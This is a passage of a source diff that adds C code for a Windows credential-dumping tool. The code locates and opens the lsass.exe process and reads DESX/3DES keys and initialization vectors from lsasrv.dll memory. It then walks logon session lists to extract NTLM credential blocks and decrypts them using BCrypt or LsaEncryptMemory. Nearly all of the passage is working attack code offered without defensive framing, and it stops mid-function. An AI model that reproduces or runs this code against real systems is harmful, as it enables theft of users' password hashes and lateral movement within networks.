+	// Get Base Address of a DLL in a specific process defined by its PID
+	MODULEENTRY32 m;
+	HANDLE hModuleSnap = INVALID_HANDLE_VALUE;
+	LPBYTE buffer = NULL;
+
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(BYTE));
+
+	// take snapshot of modules of a process
+	hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPid);
+	if (hModuleSnap == INVALID_HANDLE_VALUE){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] CreateToolhelp32Snapshot(): %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return 0;
+	}
+
+	m.dwSize = sizeof(MODULEENTRY32);
+
+	if (!Module32First(hModuleSnap, &m)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Module32First(): %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		if (buffer) free(buffer); buffer = NULL;
+		CloseHandle(hModuleSnap);
+		return 0;
+	}
+
+	do {
+		if ((_tcsicmp(m.szModule, DllName) == 0)){
+			// case insensitive because it can be "lsasrv.dll", "LSASRV.dll" 
+			CloseHandle(hModuleSnap);
+			if (buffer) free(buffer); buffer = NULL;
+			return m.modBaseAddr;
+		}
+	} while (Module32Next(hModuleSnap, &m));
+	
+	if (buffer) free(buffer); buffer = NULL;
+	CloseHandle(hModuleSnap);
+	return 0;
+}
+
+BOOL GetPidByName(LPCTSTR lpszProcessName, LPDWORD lpPid){
+	// Look for PID of a process name
+	HANDLE hProcessSnap;
+	PROCESSENTRY32 pe32;
+	LPBYTE buffer = NULL;
+
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(BYTE));
+
+	// Take snapshot of running processes
+	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (hProcessSnap == INVALID_HANDLE_VALUE){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] CreateToolhelp32Snapshot(): %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+	
+	// Set the size of the structure before using it
+	pe32.dwSize = sizeof(PROCESSENTRY32);
+
+	// Get info from the first process of the snapshot
+	if (!Process32First(hProcessSnap, &pe32)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Module32First(): %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		CloseHandle(hProcessSnap);
+		if (buffer) free(buffer); buffer = NULL;
+		return FALSE;
+	}
+	
+	do{	
+		if (_tcscmp(pe32.szExeFile, lpszProcessName) == 0){
+			// compare process name with the process looking for
+			*lpPid = pe32.th32ProcessID;
+			if (buffer) free(buffer); buffer = NULL;
+			CloseHandle(hProcessSnap);
+			return TRUE;
+		}
+	} while(Process32Next(hProcessSnap, &pe32));
+
+	if (buffer) free(buffer); buffer = NULL;
+	CloseHandle(hProcessSnap);
+	return FALSE;
+}
+
+BOOL OpenLsass(){
+	// Create a Handle for LSASS process
+	LPBYTE buffer = NULL;
+	DWORD dwPid;
+	BOOL res;
+
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(BYTE));
+	res = GetPidByName(_T("lsass.exe"), &dwPid);
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("LSASS.EXE PID : %d \n"), dwPid);
+	OutputDebugString(buffer);
+	if (res){
+		//PROCESS_QUERY_INFORMATION used to call GetProcessId() on Xp and 2003 systems
+		hLsass = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwPid);
+
+		if (hLsass != NULL){
+			dllBaseAddr = GetDllBaseAddr(dwPid, _T("lsasrv.dll"));
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("DLL Base addr %p\n"), dllBaseAddr);
+			OutputDebugString(buffer);
+			return TRUE;
+		} else {
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call OpenProcess(): %d\n\t You maybe missed to get SYSTEM rights\n"), GetLastError());
+			OutputDebugString(buffer);
+		}
+	}
+	if (buffer) free(buffer); buffer = NULL;
+	return FALSE;
+}
+
+BOOL CloseLsass(){
+	// Close LSASS Handle
+	if (hLsass) {
+		if (CloseHandle(hLsass) != 0){
+			return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+BOOL GetDataInMemory(VOID){
+	// Get decrypt and session informations from memory
+	LPBYTE buffer = NULL;
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(BYTE));
+	
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasv.dll?LogonSessionListCount : %p\n"), (dllBaseAddr + symbAddr.LogonSessionListCountAddr));
+	OutputDebugString(buffer);
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasv.dll?LogonSessionList : %p\n"), (dllBaseAddr + symbAddr.LogonSessionListAddr));
+	OutputDebugString(buffer);
+
+
+	// Get number of logonsession in list
+	if (!ReadProcessMemory(hLsass, (LPCVOID) (dllBaseAddr + symbAddr.LogonSessionListCountAddr), &LogonSessionListCount, sizeof(LogonSessionListCount), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read LogonSessionListCount: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}	
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Session List Count : %d\n"), LogonSessionListCount);
+	OutputDebugString(buffer);
+
+	// Get OS version
+	ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
+	osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+	if (!GetVersionEx(&osvi)){
+		return FALSE;
+	}
+
+	// At least NT 5.1 (XP/2003)
+	if (osvi.dwMajorVersion <= 5 && osvi.dwMinorVersion < 1){
+		return FALSE;
+	}
+
+	// OS < Vista SP1
+	if ((osvi.dwMajorVersion < 6) || (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0 && (_tcscmp(osvi.szCSDVersion, _T("")) == 0))){
+		GetDataInXPMemory();
+	} else{	// OS > Vista SP1
+		GetDataInPostVistaMemory();
+	}
+	if (buffer) free(buffer); buffer = NULL;
+	return TRUE;
+}
+
+
+BOOL GetDataInXPMemory(VOID){
+	// Get decrypt information from memory for system older than Vista SP1
+	LPBYTE buffer = NULL, tmp = NULL;
+	int i = 0;
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(BYTE));
+	tmp = calloc(SMALL_BUFFER_SIZE, sizeof(BYTE));
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasrv.dll?g_Feedback : %p\n"), (dllBaseAddr + symbAddr.FeedbackAddr));
+	OutputDebugString(buffer);
+
+	// read g_Feedback from LSASS memory
+	if (!ReadProcessMemory(hLsass, (LPCVOID) (dllBaseAddr + symbAddr.FeedbackAddr), &g_Feedback, sizeof(g_Feedback), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read g_Feedback: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+	
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("g_Feedback: "));
+	for (i = 0 ; i<sizeof(g_Feedback) ; i++){
+		_sntprintf_s(tmp, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%.2x "), g_Feedback[i]);
+		_tcscat_s(buffer, LARGE_BUFFER_SIZE, tmp);
+	}
+	OutputDebugString(buffer);
+	OutputDebugString(_T("\n"));
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasrv.dll?g_pDESXKey: %p\n"), (dllBaseAddr + symbAddr.PDesxKeyAddr));
+	OutputDebugString(buffer);
+
+	// read DESX Key pointer address from LSASS memory
+	if (!ReadProcessMemory(hLsass, (LPCVOID) (dllBaseAddr + symbAddr.PDesxKeyAddr), &g_pDESXKey, sizeof(LONG_PTR), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read g_pDESXKey: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// read datas from DES X Key in LSASS Memory
+	if(!ReadProcessMemory(hLsass, (LPCVOID) g_pDESXKey, &g_DESXKey, sizeof(g_DESXKey), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read g_pDESXKey: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("g_pDESXKey: "));
+	for (i = 0 ; i<sizeof(g_DESXKey) ; i++){
+		_sntprintf_s(tmp, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%.2x "), g_DESXKey[i]);
+		_tcscat(buffer, tmp);
+	}
+	OutputDebugString(buffer);
+	OutputDebugString(_T("\n"));
+
+	if (buffer) free(buffer); buffer = NULL;
+	if (tmp) free(tmp); tmp = NULL;
+	return TRUE;
+}
+
+BOOL GetDataInPostVistaMemory(VOID){
+	// Get decrypt information from post Vista SP1 memory
+	LPBYTE buffer = NULL;
+	LPBYTE tmp = NULL;
+	int i = 0;
+
+	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(BYTE));
+	tmp = calloc(SMALL_BUFFER_SIZE, sizeof(BYTE));
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasrv.dll?InitializationVector: %p\n"), (dllBaseAddr + symbAddr.IVAddr));
+	OutputDebugString(buffer);
+
+	// read initializationvector from LSASS memory
+	if(!ReadProcessMemory(hLsass, (LPCVOID) (dllBaseAddr + symbAddr.IVAddr), &initializationVector, sizeof(initializationVector), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read initializationVector: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Initialization Vector: "));
+	for (i = 0 ; i<sizeof(initializationVector) ; i++){
+		_sntprintf_s(tmp, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%.2xh "), initializationVector[i]);
+		_tcscat_s(buffer, LARGE_BUFFER_SIZE, tmp);
+	}
+	OutputDebugString(buffer);
+	OutputDebugString(_T("\n"));
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasrv.dll?h3DesKey: %p\n"), (dllBaseAddr + symbAddr.H3DesKeyAddr));
+	OutputDebugString(buffer);
+
+	// read pointer of h3DesKey in LSASS memory
+	if (!ReadProcessMemory(hLsass, (LPCVOID) (dllBaseAddr + symbAddr.H3DesKeyAddr), &h3DesKey, sizeof(LONG_PTR), NULL)) {
+		return FALSE;
+	}
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("BCRYPT_KEY_HANDLE structure address: %p\n"), (h3DesKey));
+	OutputDebugString(buffer);	
+	
+	// read BCRYPT_KEY_HANDLE structure for 3DESKey in LSASS memory
+	if (!ReadProcessMemory(hLsass, (LPCVOID) h3DesKey, &hBcrypt3DesKey, sizeof(hBcrypt3DesKey), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read BCRYPT_KEY_HANDLE: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("3DesKey addr (BCRYPT_KEY_HANDLE.hkey): %p\n"), (hBcrypt3DesKey.hKey));
+	OutputDebugString(buffer);
+
+	// read MSCRYPT_KEY_HANDLE structure from LSASS memory
+	if (osvi.dwMajorVersion <= 6 && osvi.dwMinorVersion < 2){
+		// Before Windows 8/2012
+		if(!ReadProcessMemory(hLsass, (LPCVOID) hBcrypt3DesKey.hKey, &hMscrypt3DesKey, sizeof(hMscrypt3DesKey), NULL)){
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read MSCRYPT_KEY_HANDLE: %d\n"), GetLastError());
+			OutputDebugString(buffer);
+			return FALSE;
+		}
+
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("3DES KEY: "));
+		for (i = 0 ; i<sizeof(hMscrypt3DesKey.pbSecret) ; i++){
+			_sntprintf_s(tmp, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%.2xh "), hMscrypt3DesKey.pbSecret[i]);
+			_tcscat_s(buffer, LARGE_BUFFER_SIZE, tmp);
+		}
+		OutputDebugString(buffer);
+		OutputDebugString(_T("\n"));
+
+	} else {
+		// Since Windows 8/2012
+		if(!ReadProcessMemory(hLsass, (LPCVOID) hBcrypt3DesKey.hKey, &hMscrypt3DesKeyNT62, sizeof(hMscrypt3DesKeyNT62), NULL)){
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read MSCRYPT_KEY_HANDLE: %d\n"), GetLastError());
+			OutputDebugString(buffer);
+			return FALSE;
+		}
+
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("3DES KEY: "));
+		for (i = 0 ; i<sizeof(hMscrypt3DesKeyNT62.pbSecret) ; i++){
+			_sntprintf_s(tmp, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%.2xh "), hMscrypt3DesKeyNT62.pbSecret[i]);
+			_tcscat_s(buffer, LARGE_BUFFER_SIZE, tmp);
+		}
+		OutputDebugString(buffer);
+		OutputDebugString(_T("\n"));
+
+	}
+
+	if (tmp) free(tmp); tmp = NULL;
+	if (buffer) free(buffer); buffer = NULL;
+	return TRUE;
+}
+
+int GetHashes(PCREDS_INFOS aCredsInfos){
+	// Get the structure containing the hashes
+	unsigned long i = 0, s = 0;
+	int idx_session = -1;
+	LONG_PTR lpHashes;
+	HANDLE hHeap = NULL;
+	PSESSION_ENTRY lpSessionEntry = NULL;
+	PCREDS_ENTRY lpCredsEntry = NULL;
+	PCREDS_HASH_ENTRY lpCredsHashEntry = NULL;
+	LPBYTE lpNtlmCredsBlock = NULL;
+	LPBYTE buffer = NULL, tmp = NULL;
+
+	hHeap = HeapCreate(0, 0, 0);	
+
+	#if defined _WIN64
+	/*
+	64 bits
+	sizeof(SESSION_ENTRY)
+		XP : 344 bytes
+		Vista : 560 bytes
+		Seven : 568 bytes
+	*/
+	if (osvi.dwMajorVersion < 6){
+		// Before NT6.0
+		cbSessionEntry = 344;
+	} else if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0){
+		// NT6.0
+		cbSessionEntry = 560;
+	} else{
+		// Since NT6.1
+		cbSessionEntry = 568;
+	}
+	#else
+	/*
+	32 bits
+	sizeof(SESSION_ENTRY)
+		XP : 192 bytes
+		Vista & Seven : 352 bytes
+	*/
+	if (osvi.dwMajorVersion < 6){
+		// Before NT6.0
+		cbSessionEntry = 192;
+	} else {
+		// Since NT6.0
+		cbSessionEntry = 352;
+	}
+	#endif
+
+	lpSessionEntry = (PSESSION_ENTRY) HeapAlloc(hHeap, HEAP_ZERO_MEMORY, (sizeof(BYTE) * cbSessionEntry));
+	lpCredsEntry = (PCREDS_ENTRY) HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(CREDS_ENTRY));
+	lpCredsHashEntry = (PCREDS_HASH_ENTRY) HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(CREDS_HASH_ENTRY));
+	buffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(BYTE));
+
+	tmp = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE * sizeof(BYTE));
+
+	for (s = 0 ; s < LogonSessionListCount; s++){
+		if (!ReadProcessMemory(hLsass, (LPCVOID) ((dllBaseAddr + symbAddr.LogonSessionListAddr)+(s*2*sizeof(DWORD_PTR))),
+			&LogonSessionList, sizeof(LogonSessionList), NULL)){
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read LogonSessionList: %d\n"), GetLastError());
+				OutputDebugString(buffer);
+			return idx_session;
+		}
+	
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("SessionListAddr(%d): %ph\n"), s, ((dllBaseAddr + symbAddr.LogonSessionListAddr)+(s*2*sizeof(DWORD_PTR))));
+		OutputDebugString(buffer);
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Address of the first session of the list: %ph\n"), LogonSessionList);
+		OutputDebugString(buffer);
+		
+		do{
+			//
+			// SESSION_ENTRY
+			//
+			if (osvi.dwMajorVersion < 6){
+				// get SESSION_ENTRY
+				if (!ReadProcessMemory(hLsass, (LPCVOID) (LogonSessionList), lpSessionEntry, sizeof(SESSION_ENTRY), NULL)){
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read SessionEntry: %d\n"), GetLastError());
+					OutputDebugString(buffer);
+					return idx_session;
+				}
+
+				// set pointer to CREDS_ENTRY structure from memory
+				lpHashes = (LONG_PTR) lpSessionEntry->CredsEntry;
+			} else{
+				
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("LogonSessionList value: %ph\n"), LogonSessionList);
+				OutputDebugString(buffer);
+
+				// Since Vista, offset to CredsEntry in SESSION_ENTRY structure has changed
+				if (!ReadProcessMemory(hLsass, (LPCVOID) LogonSessionList, lpSessionEntry, (cbSessionEntry*sizeof(BYTE)), NULL)){
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read SessionEntry: %d\n"), GetLastError());
+					OutputDebugString(buffer);
+					return idx_session;
+				}
+
+				#if defined _WIN64
+					if (osvi.dwMajorVersion <= 6 && osvi.dwMinorVersion < 2){
+						lpHashes = (LONG_PTR) *(&lpSessionEntry->CredsEntry+13);
+					} else {
+						lpHashes = (LONG_PTR) *(&lpSessionEntry->CredsEntry+17);
+					}
+				#else
+					if (osvi.dwMajorVersion <= 6 && osvi.dwMinorVersion < 2){
+						lpHashes = (LONG_PTR) *(&lpSessionEntry->CredsEntry+16);
+					} else {
+						lpHashes = (LONG_PTR) *(&lpSessionEntry->CredsEntry+18);
+					}
+				#endif
+			}
+
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("lpSessionEntry->CredsEntry[+off]: %ph\n"), lpHashes);
+			OutputDebugString(buffer);
+
+			//
+			// CREDS_ENTRY
+			//
+			
+			if (lpHashes){
+				// get CREDS_ENTRY structure from memory
+				if (!ReadProcessMemory(hLsass, (LPCVOID) lpHashes, (LPVOID) lpCredsEntry, sizeof(CREDS_ENTRY), NULL)){
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read CREDS_ENTRY: %d\n"), GetLastError());
+					OutputDebugString(buffer);
+					return idx_session;
+				}
+
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("lpCredsEntry->CredsHashEntry: %ph\n"), lpCredsEntry->CredsHashEntry);
+				OutputDebugString(buffer);
+								
+				//
+				// CREDS_HASH_ENTRY
+				//
+				
+				if (lpCredsEntry->CredsHashEntry){
+					if (!ReadProcessMemory(hLsass, (LPCVOID) lpCredsEntry->CredsHashEntry, (LPVOID) lpCredsHashEntry, sizeof(CREDS_HASH_ENTRY), NULL)){
+						_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read CREDS_HASH_ENTRY: %d\n"), GetLastError());
+						OutputDebugString(buffer);
+						return idx_session;
+					}
+
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("CredsHashEntry->HashBuffer: %ph\n"), lpCredsHashEntry->HashBuffer);
+					OutputDebugString(buffer);
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("CredsHashEntry->HashLength: %x\n"), lpCredsHashEntry->HashLength);
+					OutputDebugString(buffer);
+
+					//
+					// NTLM_CREDS_BLOCK
+					//
+					
+					lpNtlmCredsBlock = (LPBYTE) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lpCredsHashEntry->HashLength * sizeof(BYTE));
+					if (lpCredsHashEntry->HashBuffer){
+						if(!ReadProcessMemory(hLsass, (LPCVOID) lpCredsHashEntry->HashBuffer, (LPVOID) lpNtlmCredsBlock, lpCredsHashEntry->HashLength, NULL)){
+							_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read CredsHashEntry->HashBuffer: %d\n"), GetLastError());
+							OutputDebugString(buffer);
+							return idx_session;
+						}
+						_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("lpNtlmCredsBlock: %ph\n"), (lpNtlmCredsBlock));
+						OutputDebugString(buffer);
+						
+						_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("NTLM CREDS BLOCK : \n"));
+						for (i = 0 ; i<lpCredsHashEntry->HashLength ; i++){
+							_sntprintf_s(tmp, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%.2xh "), lpNtlmCredsBlock[i]);
+							_tcscat_s(buffer, LARGE_BUFFER_SIZE, tmp);
+						}
+						OutputDebugString(buffer);
+						OutputDebugString(_T("\n"));
+
+						idx_session++;
+						DecryptHashes(lpNtlmCredsBlock, lpCredsHashEntry->HashLength, aCredsInfos, idx_session);
+					}
+				}
+			}
+		
+			LogonSessionList = (LONG_PTR) lpSessionEntry->NextEntry;
+			OutputDebugString(_T("------\n"));
+		} while(LogonSessionList != ((LONG_PTR) ( (dllBaseAddr + symbAddr.LogonSessionListAddr)+(s*2*sizeof(DWORD_PTR)))));
+	}
+	
+	if (tmp) HeapFree(hHeap, 0, tmp);   tmp = NULL;
+	if (buffer) HeapFree(hHeap, 0, buffer);   buffer = NULL;
+	if (lpCredsEntry) HeapFree(hHeap, 0, lpCredsEntry); lpCredsEntry = NULL;
+	if (lpCredsHashEntry) HeapFree(hHeap, 0, lpCredsHashEntry); lpCredsHashEntry = NULL;
+	if (lpSessionEntry) HeapFree(hHeap, 0, lpSessionEntry); lpSessionEntry = NULL;
+	if (lpNtlmCredsBlock) HeapFree(hHeap, 0, lpNtlmCredsBlock); lpNtlmCredsBlock = NULL;
+	if (hHeap) HeapDestroy(hHeap);
+	return idx_session;
+}
+
+
+BOOL LsaInitAndDecrypt(LPTSTR lpBuffer, size_t cbBuffer){
+	HMODULE hBaseAddr = INVALID_HANDLE_VALUE;
+	LPBYTE buffer = NULL;
+
+	LsaEncryptMemoryFunction LsaEncryptMemory = (LsaEncryptMemoryFunction) (dllBaseAddr + symbAddr.LsaEncryptMemoryAddr);
+
+	buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(BYTE));
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Lsasrv.dll?LsaEncryptMemory: %ph\n"), LsaEncryptMemory);
+	OutputDebugString(buffer);
+
+	// mandatory, because we need lsasrv.dll to be loaded to use LsaEncryptMemory()
+	hBaseAddr = LoadLibrary(_T("lsasrv.dll"));
+	if (!hBaseAddr){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to load Lsasrv.dll: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	if ((osvi.dwMajorVersion < 6) || (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0 && (_tcscmp(osvi.szCSDVersion, _T("")) == 0))){
+		// Copy the initialization vector in memory
+		memcpy((LPVOID) (dllBaseAddr + symbAddr.FeedbackAddr), g_Feedback, sizeof(g_Feedback));
+
+		// Replace the address of the "key" to our own, extracted from LSASS
+		*((LPBYTE *) (dllBaseAddr + symbAddr.PDesxKeyAddr)) = (LPBYTE) &g_DESXKey;
+	
+		LsaEncryptMemory(lpBuffer, cbBuffer, 0);
+	}
+
+	if (hBaseAddr) FreeLibrary(hBaseAddr);
+	if (buffer) HeapFree(GetProcessHeap(), 0, buffer); buffer = NULL;
+	return TRUE;
+}
+
+BOOL BcryptInitAndDecrypt(LPTSTR lpInput, size_t cbInput, LPTSTR lpOutput){
+	HMODULE hBcryptDll = INVALID_HANDLE_VALUE;
+	BCRYPT_HANDLE h3desProvider = NULL;
+	BCRYPT_KEY_HANDLE h3desKey = NULL;
+	ULONG objLen = 0, blockLen = 0, nbRead = 0, plainTextSize = 0; 
+	LPBYTE lpKeyObj = NULL, lpIV = NULL, buffer = NULL, tmp = NULL;
+	NTSTATUS res = 0;
+
+	// Structure where the 3DES Key will be copy in order to be able to import
+	typedef struct _KEYBLOB {
+		BCRYPT_KEY_DATA_BLOB_HEADER header;
+		UCHAR key[24];	// Key buffer
+	} KEYBLOB;
+
+	KEYBLOB keyblob;
+	keyblob.header.dwMagic = BCRYPT_KEY_DATA_BLOB_MAGIC;
+	keyblob.header.dwVersion = BCRYPT_KEY_DATA_BLOB_VERSION1;
+	keyblob.header.cbKeyData = 24;
+
+	buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(BYTE));
+	tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE * sizeof(BYTE));
+
+	hBcryptDll = LoadLibrary(_T("bcrypt.dll"));
+	if (!hBcryptDll){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to load Bcrypt.dll: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// Open a 3DES Algorithm Provider
+	res = BCryptOpenAlgorithmProvider(&h3desProvider, BCRYPT_3DES_ALGORITHM, 0, 0);
+	if (res){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BCryptOpenAlgorithmProvider():\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// Get Length of 3DES Key 
+	res = BCryptGetProperty(h3desProvider, BCRYPT_OBJECT_LENGTH, (PBYTE) &objLen, sizeof(ULONG), &nbRead, 0);
+	if(res){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BCryptGetProperty(BCRYPT_OBJECT_LENGTH):\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// Get Length of 3DES IV
+	res = BCryptGetProperty(h3desProvider, BCRYPT_BLOCK_LENGTH, (PBYTE) &blockLen, sizeof(ULONG), &nbRead, 0);
+	if (res){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BCryptGetProperty(BCRYPT_BLOCK_LENGTH):\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// Allocate buffers for Key and IV
+	lpKeyObj = (LPBYTE) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, objLen);
+	lpIV = (LPBYTE) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, blockLen);
+
+	// Set CBC mode 
+	res = BCryptSetProperty(h3desProvider, BCRYPT_CHAINING_MODE, (PBYTE) BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
+	if (res){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BCryptSetProperty(BCRYPT_CHAINING_MODE):\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// copy from different structure depending on Windows version
+	if (osvi.dwMajorVersion <= 6 && osvi.dwMinorVersion < 2){
+		memcpy(keyblob.key, hMscrypt3DesKey.pbSecret, sizeof(keyblob.key));
+	} else {
+		memcpy(keyblob.key, hMscrypt3DesKeyNT62.pbSecret, sizeof(keyblob.key));
+	}
+
+	// Import LSASS Key from memory in BCRYPT initialized environnement
+	res = BCryptImportKey(h3desProvider, NULL, BCRYPT_KEY_DATA_BLOB, &h3desKey, lpKeyObj, objLen, (PUCHAR) &keyblob, sizeof(keyblob), 0);
+	if (res){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BCryptImportKey():\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// copy extracted IV from LSASS memory in Bcrypt structures
+	memcpy(lpIV, initializationVector, 8 * sizeof(BYTE));
+	
+	// calcul size of the cipher text
+	res = BCryptDecrypt(h3desKey, lpInput, cbInput, 0, lpIV, 8, 0, 0, &plainTextSize, 0);
+	if (res){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BcryptDecrypt() to calcul plainTextSize:\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	// Decryption of the buffer
+	res = BCryptDecrypt(h3desKey, lpInput, cbInput, 0, lpIV, 8, lpOutput, plainTextSize, &plainTextSize, 0);
+	if (res){
